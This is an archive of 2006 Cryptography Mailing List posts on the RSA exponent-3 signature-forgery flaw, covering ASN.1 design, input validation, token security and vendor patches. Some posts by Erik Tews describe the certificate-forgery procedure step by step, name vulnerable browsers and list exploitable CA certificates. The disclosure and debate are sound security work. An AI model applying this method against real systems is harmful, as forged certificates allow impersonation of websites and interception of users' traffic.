Re: Exponent 3 damage spreads...

2006-09-15 Thread Peter Gutmann
Simon Josefsson [EMAIL PROTECTED] writes:

Deploying a hash widely isn't done easily, though.  GnuTLS only support MD2,
MD5, SHA-1 and RIPEMD (of which MD2/MD5 are by default not used to verify
signatures).

Right, but it's been pure luck that that particular implementation (and most
likely a number of others) happen to have implemented only a small number of
hash algorithms that allow only absent or NULL parameters.  Anything out there
that implements a wider range of algorithms, including any that allow
parameters, is most likely toast.

What's more scary is that if anyone introduces a parameterised hash (it's
quite possible that this has already happened in some fields, and with the
current interest in randomised hashes it's only a matter of time before we see
these anyway), then changing a simple AlgoID definition in one part of the
code is going to suddently break signatures 23 code modules away in a
different directory.  Will whoever's responsible for maintaining the hash
AlgoID table in some far-removed code module in several years' time know that
any change they make could cause a security breach via a non-obvious mechanism
in a far-distant piece of code?  This is just going to keep coming back and
biting us again and again unless we default to deny-all.

The e=3 issue is like the old war movies where someone steps on a mine and
hears the click, but isn't quite sure yet how long it'll be before they spread
themselves decoratively around the countryside.  We've heard the click, it's
time to get out of the minefield.

Peter.

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: Exponent 3 damage spreads...

2006-09-15 Thread Bill Frantz
[EMAIL PROTECTED] (James A. Donald) on Thursday, September 14, 2006 wrote:

Obviously we do need a standard for describing structured data, and we 
need a standard that leads to that structured data being expressed 
concisely and compactly, but seems to me that ASN.1 is causing a lot of 
grief.

What is wrong with it, what alternatives are there to it, or how can it 
be fixed?

In SPKI we used S-Expressions.  They have the advantage of being simple,
perhaps even too simple.

In describing interfaces in the KeyKOS design document
http://www.cis.upenn.edu/~KeyKOS/agorics/KeyKos/Gnosis/keywelcome.html
we used a notation similar to S-Expressions which was:

(length, data)

These could be combined into a structure: e.g. (4, len), (len, data) for
data proceeded by a four byte length field.  If you standardize that the
data is always right justified in a field of length len, and that
binary data is encoded with a standard encoding (hexadecimal,
6-bit/character, decimal etc.), most of the problems I have seen
described in this thread should just go away.

Some might object that having a specific number of bits for the length
field limits future expansion of this approach.  Indeed, ASN.1 avoids
this issue by allowing the encoding of infinite length integers, and
XML does the same.  The cost of that flexibility is much more difficult
encoding and decoding.  If a length field length of 4 to 8 bytes (32 to
64 bits) is chosen, as a practical matter, any length data that is
transmittable in an exchange can be represented.  (A terabit/second is
10**12 bits/second.  32 bits can represent a million seconds at that
data rate.  64 bits can represent much longer data items.)

Cheers - Bill

---
Bill Frantz| gets() remains as a monument | Periwinkle 
(408)356-8506  | to C's continuing support of | 16345 Englewood Ave
www.pwpconsult.com | buffer overruns. | Los Gatos, CA 95032

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: Why the exponent 3 error happened:

2006-09-15 Thread Peter Gutmann
Victor Duchovni [EMAIL PROTECTED] writes:

This, in my view, has little to do with ASN.1, XML, or other encoding
frameworks. Thorough input validation is not yet routinely and consistently
practiced by most software developers. Software is almost invariably written
to parse formats observed in practice correctly, and is then promptly
declared to work. 

It's not just this, sometimes the acceptance of not-quite-correct data is
necessary, because if you don't do it, your implementation breaks.  To take
one well-known example, Microsoft have consistently encoded the version info
in their SSL/TLS handshake wrong, which in theory allows rollback attacks.  So
as a developer you have the following options:

 1. Reject the encoding and be incompatible with 95(?)% of *all* deployed SSL
clients (that's *several hundred million* users).

 2. Turn a blind eye and interoperate with said several hundred million users,
at the expense of being vulnerable to rollback attacks.

I'm not aware of a single implementation that takes option 1, simply because
it would be pure marketplace suicide to do so.

The same goes for pretty much every other security protocol I know of.  SSH is
the most explicit since clients and servers exchange ASCII strings before they
do anything else, all SSH implementations have a built-in database of known
bugs that they adjust their behaviour for when they detect a certain client or
server.  Obviously no-one will implement this bug-compatibility for a security
hole, but it's not impossible that some of this extended flexibility may at
some point lead to a problem.

For other protocols, it works in reverse, you recognise the peer implemention
by the bugs, not the other way round.  Beyond straight implementation bugs
though are standards that require insecure or ambiguous behaviour, either by
accident (which eventually gets fixed), or because of design-by-committee
politics, about which enough has probably been said in the past
(cough*IPsec*cough :-).

Peter.

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: Why the exponent 3 error happened:

2006-09-15 Thread Steven M. Bellovin
On Thu, 14 Sep 2006 17:21:28 -0400, Victor Duchovni
[EMAIL PROTECTED] wrote:

 
 If so, I fear we are learning the wrong lesson, which while valid in
 other contexts is not pertinent here. TLS must be flexible enough to
 accommodate new algorithms, this means that the data structures being
 exchanged are malleable, and that implementations must validate strict
 adherence to a specifically defined form for the agreed algorithm,
 but the ability to express other forms cannot be designed out.
 
 This, in my view, has little to do with ASN.1, XML, or other encoding
 frameworks. Thorough input validation is not yet routinely and
 consistently practiced by most software developers. Software is almost
 invariably written to parse formats observed in practice correctly, and is
 then promptly declared to work. The skepticism necessary to continually
 question the implicit assumption that the input is well-formed is perhaps
 not compatible with being a well-socialized human. The attackers who ask
 the right questions to break systems and the few developers who write
 truly defensive code are definitely well off the middle of the bell-curve.
 
 It is not just PKCS#1 or X.509v3 that presents opportunities for crafting
 interesting messages. MIME, HTTP, HTML, XML, ... all exhibit similar
 pitfalls. Loosely speaking, this looks like a variant of Goedel's theorem,
 if the protocol is expressive enough it can express problematic assertions.
 
 We can fine-tune some protocols to remove stupid needless complexity, but
 enough complexity will remain to make the required implementation disciple
 beyond the reach of most software developers (at least as trained today,
 but it is not likely possible to design a training program that will
 a preponderance all strong defensive programmers).

A software testing expert once asked me why even good test groups didn't
find more of the software holes.  I told her it was because the spec said
things like must accept input up to 4096 bytes rather than must accept
input up to 4096 bytes and must detect and reject longer input strings.
I think we're seeing the same thing here -- the spec didn't say must
reject, so people who coded to the spec fell victim.

As for the not compatible with a well-socialized human -- well, maybe --
I don't think normal people describe themselves as paranoid by
profession


--Steven M. Bellovin, http://www.cs.columbia.edu/~smb

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: Why the exponent 3 error happened:

2006-09-15 Thread Richard Salz
From http://www.w3.org/2001/tag/doc/leastPower.html :

When designing computer systems, one is often faced with a choice between 
using a more or less powerful language for publishing information, for 
expressing constraints, or for solving some problem. This finding explores 
tradeoffs relating the choice of language to reusability of information. 
The Rule of Least Power suggests choosing the least powerful language 
suitable for a given purpose

--
STSM, Senior Security Architect
SOA Appliances
Application Integration Middleware


-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


RE: Real World Exploit for Bleichenbachers Attack on SSL fromCrypto'06 working

2006-09-15 Thread Erik Tews
Am Donnerstag, den 14.09.2006, 22:23 -0700 schrieb Tolga Acar:
 You need to have one zero octet after bunch of FFs and before DER encoded
 has blob in order to have a proper PKCS#1v1.5 signature encoding.
 
 Based on what you say below, I used this cert and my key to sign an
 end-entity certificate which I used to set up an webserver, it appears that
 implementations you used don't check for this one zero octet, either.

Yes, I have, I counted this to the ASN1DataWithHash part. I did not
theck if it works without.


signature.asc
Description: Dies ist ein digital signierter Nachrichtenteil


RE: Real World Exploit for Bleichenbachers Attack on SSL fromCrypto'06 working

2006-09-15 Thread Tolga Acar
You need to have one zero octet after bunch of FFs and before DER encoded
has blob in order to have a proper PKCS#1v1.5 signature encoding.

Based on what you say below, I used this cert and my key to sign an
end-entity certificate which I used to set up an webserver, it appears that
implementations you used don't check for this one zero octet, either.

- Tolga 

 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf Of Erik Tews
 Sent: Thursday, September 14, 2006 3:40 PM
 To: Cryptography
 Subject: Real World Exploit for Bleichenbachers Attack on SSL 
 fromCrypto'06 working
 
 Hi
 
 I had an idea very similar to the one Peter Gutmann had this 
 morning. I managed to write a real world exploit which takes as input:
 
   * an CA-Certificate using 1024 Bit RSA and Exponent 3 (ca-in)
   * a Public Key, using an algorithm and size of your choice
 (key-in)
 
 and generats an CA-Certificate signed by ca-in, using public 
 key key-in.
 
 At least 3 major webbrowsers on the marked are shipped by 
 default with CA certificates, which have signed other 
 intermediate CAs which use
 rsa1024 with exponent 3, in their current version. With this 
 exploit, you can now sign arbitary server certificates for 
 any website of your choice, which are accepted by all 3 
 webbrowsers without any kind of ssl-warning-message.
 
 I used the following method:
 
 I first generated a certificate, with BasicConstraints set to 
 True, Public Key set to one of my keys, and Issuer to the DN 
 of a CA using
 1024 Bit RSA with Exponent 3. I used usual values for all the 
 other fields. When I signed a Certificate I shiftet all my 
 data to the left. I had 46 bytes of fixed valued (this can 
 perhaps be reduced to 45 bytes, I have not checked yet, but 
 even with 46, this attack works). They had the form 00 01 FF 
 FF FF FF FF FF FF FF ASN1DataWithHash. This gives me 82 bytes 
 I can fill with arbitary values (at least, if the 
 implementations skipps some part of the asn1-data, I can 
 choose some bytes there too).
 
 If you now set all the bytes right of your ASN1DataWithHash 
 to 00, and interpret that as a number n, and compute:
 
y = (ceil(cubeRoot(n)))^3
 
Where ceil means rounding to the next bigger natural 
 number and cubeRoot
  computes the third Root in R.
 
 y will be a perfect cube and have the form:
 
 00 01 FF FF FF FF FF FF FF FF ASN1DataWithHash' Garbage
 
 and ASN1DataWithHash' looks quite similar to your original 
 ASN1DataWithHash, with perhaps 2-3 rightmost bytes changed. 
 These bytes are part of the certificate hash value.
 
 This signature is useless, because every certificate has a 
 fixed hash value. But you don't need to sign a fixed 
 certificate. So i started adding some seconds to the notAfter 
 value of the certificate and computed the hash again. I brute 
 forced until I had a certificate where the computation of y 
 did not alter any bytes of the ASN1DataWithHash.
 
 I had to try 275992 different values which took 2-3 minutes 
 on my 1.7 GHz Pentium using an unoptimized java-implementation.
 
 I used this cert and my key to sign an end-entity certificate 
 which I used to set up an webserver.
 
 I have to check some legal aspects before publishing the 
 names of the browser which accepted this certificate and the 
 name of the ca-certificates with exponent 3 I used in some 
 hours, if nobody tells me not to do that. Depending on the 
 advice I get, I will release the sourcecode of the exploit too.
 
 Thanks go to Alexander May and Ralf-Philipp Weinmann who helped me.
 


-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: RSA SecurID SID800 Token vulnerable by design

2006-09-15 Thread Daniel Carosone
On Thu, Sep 14, 2006 at 02:48:54PM -0400, Leichter, Jerry wrote:
 | The problem is that _because there is an interface to poll the token for
 | a code across the USB bus_, malicious software can *repeatedly* steal new
 | token codes *any time it wants to*.  This means that it can steal codes
 | when the user is not even attempting to authenticate

 I think this summarizes things nicely.

Me too.  While less emphatic, my reaction to Vin's post was similar to
Thor's.. that it seemed to at least miss, if not bury, this point.

But let's not also forget that these criticisms apply approximately
equally to smart card deployments with readers that lack a dedicated
pinpad and signing display.  For better or worse, people use those to
unlock the token with a pin entered on the host keyboard, and allow
any authentication by any application during a 'session', too.

 Pressing the button supplies exactly the confirmation of intent that
 was lost.

And further, a token that includes more buttons (specifically, a
pinpad for secure entry of the 'know' factor) is vulnerable to fewer
attacks, and one that permits a challenge-response factor for specific
transaction approval is vulnerable to fewer again (both at a cost).
Several vendors have useful offerings of these types.

The worst cost for these more advanced methods may be in user
acceptance: having to type one or more things into the token, and then
the response into the computer.  A USB connected token could improve
on this by transporting the challenge and response, displaying the
challenge while leaving the pinpad for authentication and approval.

But the best attribute of tokens is they neither use nor need *any*
interface other than a user interface. Therefore:

 * it works anywhere with any client device, like my phone. I choose
   my token model and balance user overhead according to my needs.

 * it is simple to analyse.  How would you ensure the above ideal
   hypothetical USB token really couldn't be subverted over the bus?

By the time you've given up that benefit, and done all that analysis,
and dealt with platform issues, perhaps you might as well get the
proper pinpad smartcard it's starting to sound like, and get proper
signatures as well, rather than using a shared-key with the server.

--
Dan.


pgpotlLAwVOtZ.pgp
Description: PGP signature


Re: Real World Exploit for Bleichenbachers Attack on SSL from Crypto'06 working

2006-09-15 Thread Hal Finney
Erik Tews writes:
 At least 3 major webbrowsers on the marked are shipped by default with
 CA certificates, which have signed other intermediate CAs which use
 rsa1024 with exponent 3, in their current version. With this exploit,
 you can now sign arbitary server certificates for any website of your
 choice, which are accepted by all 3 webbrowsers without any kind of
 ssl-warning-message.

Is that true, did you try all 3 web browsers to see that they don't give
a warning message?  It's not enough that they accept a CA with exponent
3, they also have to have the flaw in verification that lets the bogus
signature through.

If it is true, if three different widely used webbrowsers are all
vulnerable to this attack, it suggests a possible problem due to the
establishment of a cryptographic monoculture.  If it turns out that
the same cryptographic library is used in all three of these browsers,
and that library has the flaw, then this reliance on a single source
for cryptographic technology could be a mistake.

Now in practice I don't think that Internet Explorer and Mozilla/Firefox
use the same crypto libraries, so either these are not two of the three,
or else they have independently made the same error.  It would be nice
to know which it is.

Hal Finney

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


A note on vendor reaction speed to the e=3 problem

2006-09-15 Thread Peter Gutmann
When I fired up Firefox a few minutes ago it told me that there was a new
update available to fix security problems.  I thought, Hmm, I wonder what
that would be  It's interesting to note that we now have fixes for many
of the OSS crypto apps (OpenSSL, gpg, Firefox (via NSS, so probably
Thunderbird as well), my own cryptlib), but nothing from any of the commercial
vendors.  Maybe someone should convert this into a DRM attack so Microsoft
will fix it before 2007 :-).

(The real #*($#*( for me is that I wanted to turn off e=3 years ago, but when
I did it in a snapshot release some squawk piped up to say that they were
using e=3 and the standard said it was OK and I was being non-standards
compliant and so on and so forth, so in the end I had to leave it enabled.  I
did make it very easy to turn off with a single-character code change, but
that may explain why commercial vendors are going to be reluctant to rush out
a fix without a lot of prior impact assessment).

Peter.

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: Exponent 3 damage spreads...

2006-09-15 Thread Jostein Tveit
[EMAIL PROTECTED] (Peter Gutmann) writes:

 What's more scary is that if anyone introduces a parameterised hash (it's
 quite possible that this has already happened in some fields, and with the
 current interest in randomised hashes it's only a matter of time before we see
 these anyway) [...]

Both Rivest and Shamir said that they want a parameterised hash
according to Paul Hoffman's Notes from the Hash Futures Panel.
URL: http://www.proper.com/lookit/hash-futures-panel-notes.html 

Maybe thats not so good after all.
Or maybe the not so good thing here is exponent equal to 3...

-- 
Jostein Tveit [EMAIL PROTECTED]

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: Why the exponent 3 error happened:

2006-09-15 Thread James A. Donald

--
Victor Duchovni wrote:
 If so, I fear we are learning the wrong lesson, which
 while valid in other contexts is not pertinent here.
 TLS must be flexible enough to accommodate new
 algorithms, this means that the data structures being
 exchanged are malleable, and that implementations must
 validate strict adherence to a specifically defined
 form for the agreed algorithm, but the ability to
 express other forms cannot be designed out.

There is no need, ever, for the RSA signature to encrypt
anything other than a hash, nor will their ever be such
a need.  In this case the use of ASN.1 serves absolutely
no purpose whatsoever, other than to create complexity,
bugs, and opportunities for attack.  It is sheer
pointless stupidity, complexity for the sake of
complexity, an indication that the standards process is
broken.

--digsig
 James A. Donald
 6YeGpsZR+nOTh/cGwvITnSR3TdzclVpR0+pr3YYQdkG
 mKNEZf/r5lZqyGpNhzkQ0zdt2uAdaxkSyyyxAW3W
 4BWO8prrBiE/VfMik8xpeS4TgD+5KsqGSGeRw2Dxr

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: Exponent 3 damage spreads...

2006-09-15 Thread Peter Gutmann
Simon Josefsson [EMAIL PROTECTED] writes:

Test vectors for this second problem are as below, created by Yutaka OIWA.

To make this easier to work with, I've combined them into a PKCS #7 cert chain
(attached).  Just load/click on the chain and see what your app says.

(As an aside, this chain is invalid for an entirely unrelated reason, so no
standards-compliant PKI application should validate this chain even if the
signature did check out.  I wonder how many current apps will detect this?
See, you don't even need PKCS #1 padding tricks to fool a PKI app... :-).

Peter.

[2. application/octet-stream; bad_chain.der]...

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: Why the exponent 3 error happened:

2006-09-15 Thread Peter Gutmann
Steven M. Bellovin [EMAIL PROTECTED] writes:

As for the not compatible with a well-socialized human -- well, maybe -- I
don't think normal people describe themselves as paranoid by profession

Might I refer the reader to http://www.cs.auckland.ac.nz/~pgut001/.  I've even
received mail from address-harvesting bots that begin Dear Paranoid, 

Peter.

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: A note on vendor reaction speed to the e=3 problem

2006-09-15 Thread David Shaw
On Fri, Sep 15, 2006 at 08:49:31PM +1200, Peter Gutmann wrote:

 When I fired up Firefox a few minutes ago it told me that there was
 a new update available to fix security problems.  I thought, Hmm, I
 wonder what that would be  It's interesting to note that we now
 have fixes for many of the OSS crypto apps (OpenSSL, gpg, Firefox

GPG was not vulnerable, so no fix was issued.  Incidentally, GPG does
not attempt to parse the PKCS/ASN.1 data at all.  Instead, it
generates a new structure during signature verification and compares
it to the original.

David

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: Why the exponent 3 error happened:

2006-09-15 Thread Hal Finney
James Donald writes:
 There is no need, ever, for the RSA signature to encrypt
 anything other than a hash, nor will their ever be such
 a need.  In this case the use of ASN.1 serves absolutely
 no purpose whatsoever, other than to create complexity,
 bugs, and opportunities for attack.  It is sheer
 pointless stupidity, complexity for the sake of
 complexity, an indication that the standards process is
 broken.

Actually there is something besides the hash there: an identifier for
which hash algorithm is used.  The ASN.1 OID was, I suppose, a handy and
already-existant mechanism for universal algorithm identification numbers.

Putting the hash identifier into the RSA signed data prevents hash
substitution attacks.  Otherwise the hash identifier has to be passed
unsigned, and an attacker could substitute a weak hash algorithm and find
a second preimage that matches your signed hash.  Maybe that is not part
of a threat model you are interested in but at least some signers don't
want their hash algorithms to be changed.

BTW I want to mention a correction to Peter Gutmann's post: as I
understand it, GnuPG was not vulnerable to this attack.  Neither was PGP.
The OpenPGP standard passes the hash number outside the RSA signed data
in addition to using PKCS-1 padding.  This simplifies the parsing as it
allows hard-coding the ASN-1 prefix as an opaque bit string, then doing
a simple comparison between the prefix+hash and what it should be.

Hal Finney

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: Why the exponent 3 error happened:

2006-09-15 Thread Ben Laurie
James A. Donald wrote:
 --
 Greg Rose wrote:
 At 19:02  +1000 2006/09/14, James A. Donald wrote:
 Suppose the padding was simply

 010101010101010 ... 1010101010101 hash

 with all leading zeros in the hash omitted, and four
 zero bits showing where the actual hash begins.

 Then the error would never have been possible.
 
 James A. Donald:
 I beg to differ. A programmer who didn't understand
 the significance of crypto primitives would (as many
 did) just search for the end of the padding to locate
 the beginning of the hash, and check that the next set
 of bytes were identical to the hash, then return
 true. So
 
 The hash is known size, and occurs in known position.
 He does not search the padding for location, but
 examines it for correct format.
 

 01010101 ... 1010101010101 hash crappetycrap

 would still be considered valid. There's a lot of code
 out there that ignored the fact that after the FFs was
 specific ASN.1 stuff, and just treated it as a defined
 part of the padding.
 
 And that code is correct, and does not have the problem
 that we discuss.  Paying attention to ASN.1 stuff is
 what is causing this problem.

No, it is incorrect and does have the problem we discuss. The fact that
it ignores the crap that's after the hash makes it vulnerable.

 Code is going wrong because ASN.1 can contain
 complicated malicious information to cause code to go
 wrong.  If we do not have that information, or simply
 ignore it, no problem.

This is incorrect. The simple form of the attack is exactly as described
above - implementations ignore extraneous data after the hash. This
extraneous data is _not_ part of the ASN.1 data.

The more complex form of the attack does actually use the ASN.1, in the
form of the parameters field. However, I'm not sure why you'd single out
ASN.1 as the cause of this problem: once the designers of the protocol
decided you needed parameters, the door was opened to the attack.
Implementations can incorrectly ignore the extraneous parameters no
matter how you encode them.

Not that I'm a fan of ASN.1, but if we're going to blame it for
problems, we should do so only when it is actually to blame.

The fault in this case is a combination of overly flexible protocol
design and implementation flaws.

Cheers,

Ben.

-- 
http://www.apache-ssl.org/ben.html   http://www.links.org/

There is no limit to what a man can do or how far he can go if he
doesn't mind who gets the credit. - Robert Woodruff

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: A note on vendor reaction speed to the e=3 problem

2006-09-15 Thread Peter Gutmann
David Shaw [EMAIL PROTECTED] writes:

Incidentally, GPG does not attempt to parse the PKCS/ASN.1 data at all.
Instead, it generates a new structure during signature verification and
compares it to the original.

How does it handle the NULL vs.optional parameters ambiguity?

Peter.

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: Real World Exploit for Bleichenbachers Attack on SSL from Crypto'06 working

2006-09-15 Thread Erik Tews
Am Freitag, den 15.09.2006, 00:40 +0200 schrieb Erik Tews:
 I have to check some legal aspects before publishing the names of the
 browser which accepted this certificate and the name of the
 ca-certificates with exponent 3 I used in some hours, if nobody tells me
 not to do that. Depending on the advice I get, I will release the
 sourcecode of the exploit too.

OK, so here are the names of the browsers I tried:

  * Mozilla Firefox Version 1.5.0.6 and all previous versions
including all old versions like netscape 4 seem to be affected.
They don't display any kind of warning message at all, nor has
the user the possibility to see something if he looks at the ssl
connection properties. Firefox 1.5.0.7 was released yesterday
and contains a fix. Netscape is not longer supported and
netscape phoned me and suggested switching to another browser
like seamonkey.
  * Opera 9.01 is affected. Opera is going to release 9.02 very very
soon which will contain a bugfix. Opera users are automatically
notified once a week when a new version is available.
  * Konqueror from the kde project uses openssl for ssl-connections.
They are affected, but after having patched openssl, konqueror
is fixed too.

The following certs could be used in the attack:

Starfieldtech has issued the following certificate:

Issuer: L=ValiCert Validation Network, O=ValiCert, Inc., OU=ValiCert Cla ss 2 
Policy Validation Authority, CN=http://www.valicert.com//emailAddress=info@ 
valicert.com
Subject: C=US, ST=Arizona, L=Scottsdale, O=Starfield Technologies, Inc.,  
OU=http://www.starfieldtech.com/repository, CN=Starfield Secure Certification A 
uthority/[EMAIL PROTECTED]
X509v3 Basic Constraints: CA:TRUE
Serial Number: 260 (0x104)
RSA Public Key: (1024 bit)
Exponent: 3 (0x3)

This can be used to create an CA certificate which seems to be signed by 
Starfieldtech

There is another certificate by default in a lot of browsers:

Issuer: C=US, O=Entrust.net, OU=www.entrust.net/CPS incorp. by ref. (limits 
liab.), OU=(c) 1999 Entrust.net Limited, CN=Entrust.net Secure Server 
Certification Authority
Subject: C=US, O=Entrust.net, OU=www.entrust.net/CPS incorp. by ref. (limits 
liab.), OU=(c) 1999 Entrust.net Limited, CN=Entrust.net Secure Server 
Certification Authority
RSA Public Key: (1024 bit)
Exponent: 3 (0x3)
X509v3 Basic Constraints: CA:TRUE
Serial Number: 927650371 (0x374ad243)

This one can be used too.

Depending on the browser you use, there are some other certificates.
Here is a list of all Subject DN of all CA certs we have found so far,
which seems to be affected:

  * C=US, O=Digital Signature Trust Co., OU=DSTCA E1
  * C=US, O=Digital Signature Trust Co., OU=DSTCA E2
  * C=US, O=Entrust.net, OU=www.entrust.net/Client_CA_Info/CPS
incorp. by ref. limits liab., OU=(c) 1999 Entrust.net Limited,
CN=Entrust.net Client Certification Authority
  * C=US, O=Entrust.net, OU=www.entrust.net/CPS incorp. by ref.
(limits liab.), OU=(c) 1999 Entrust.net Limited, CN=Entrust.net
Secure Server Certification Authority
  * C=EU, O=AC Camerfirma SA CIF A82743287,
OU=http://www.chambersign.org, CN=Chambers of Commerce Root
  * C=EU, O=AC Camerfirma SA CIF A82743287,
OU=http://www.chambersign.org, CN=Global Chambersign Root
  * C=US, O=The Go Daddy Group, Inc., OU=Go Daddy Class 2
Certification Authority
  * C=US, O=Starfield Technologies, Inc., OU=Starfield Class 2
Certification Authority

I decided to keep the actual implementation of the exploit secret for the 
moment.

We put up a little webpage summarizing some postings related to the
attack. This is written primary for end users who want to secure their
browsers, but contains links to some intresting mailing list posts too.

http://www.cdc.informatik.tu-darmstadt.de/securebrowser/


signature.asc
Description: Dies ist ein digital signierter Nachrichtenteil


Re: A note on vendor reaction speed to the e=3 problem

2006-09-15 Thread David Shaw
On Sat, Sep 16, 2006 at 05:35:27AM +1200, Peter Gutmann wrote:
 David Shaw [EMAIL PROTECTED] writes:
 
 Incidentally, GPG does not attempt to parse the PKCS/ASN.1 data at all.
 Instead, it generates a new structure during signature verification and
 compares it to the original.
 
 How does it handle the NULL vs.optional parameters ambiguity?

GPG generates a new structure for each comparison, so just doesn't
include any extra parameters on it.  Any optional parameters on a
signature would cause that signature to fail validation.

RFC-2440 actually gives the exact bytes to use for the ASN.1 stuff,
which nicely cuts down on ambiguity.

David

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


RE: Why the exponent 3 error happened:

2006-09-15 Thread Whyte, William
   If so, I fear we are learning the wrong lesson, which
   while valid in other contexts is not pertinent here.
   TLS must be flexible enough to accommodate new
   algorithms, this means that the data structures being
   exchanged are malleable, and that implementations must
   validate strict adherence to a specifically defined
   form for the agreed algorithm, but the ability to
   express other forms cannot be designed out.
 
 There is no need, ever, for the RSA signature to encrypt
 anything other than a hash, nor will their ever be such
 a need.  In this case the use of ASN.1 serves absolutely
 no purpose whatsoever, other than to create complexity,
 bugs, and opportunities for attack.  It is sheer
 pointless stupidity, complexity for the sake of
 complexity, an indication that the standards process is
 broken.

I think this is a bit unfair.

PKCS#1 signatures were originally designed to include a hash 
identifier to address a specific concern, arising from the
fact that RSA signers can freely choose the hash algorithm
to use.

Say that Alice uses SHA-1 to generate her signature on m,
and SHA-1(m) = h.

Then the concern is that Bob can find a broken hash function
BASH such that BASH(m') = h. If he can do that and format a
message that claims to be signed with RSA and BASH, then he
can present Alice's signature as a valid signature on m'.

There are a number of different protections against this.
For example, Alice's cert could identify her key as only 
to be used with SHA-1 (this is effectively what happens with
DSA public keys). However, the convention has been to mark an
RSA key in an X.509 cert as rsaEncryption and not specify
in the AlgorithmIdentifier that it's only to be used with a
certain hash function (or signature scheme).

So PKCS#1 incorporated the hash identifier, which prevents
a signature generated with one hash algorithm from being
used with a different hash algorithm. (Since then, Burt
Kaliski's done some research on the use of hash firewalls
of this type: see
http://www.rsasecurity.com/rsalabs/node.asp?id=2020.
His conclusion is that by and large they aren't necessary,
but that isn't relevant to the discussion here).

At the time, ASN.1 was in widespread use, so it was an 
obvious decision (rather than pointless stupidity) to use 
it to encode the hash function identifier. In practice, 
the ASN.1 doesn't introduce complexity because most implementations 
(certainly ones I've worked on) simply treated it as a memcmp 
rather than wheeling out the heavy ASN.1 machinery.

The real problem isn't ASN.1; the problem is that an
encoding method was used for the rest of the signature
that didn't specify the length of the signature block
and it didn't occur to anyone to check it.

Cheers,

William


-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]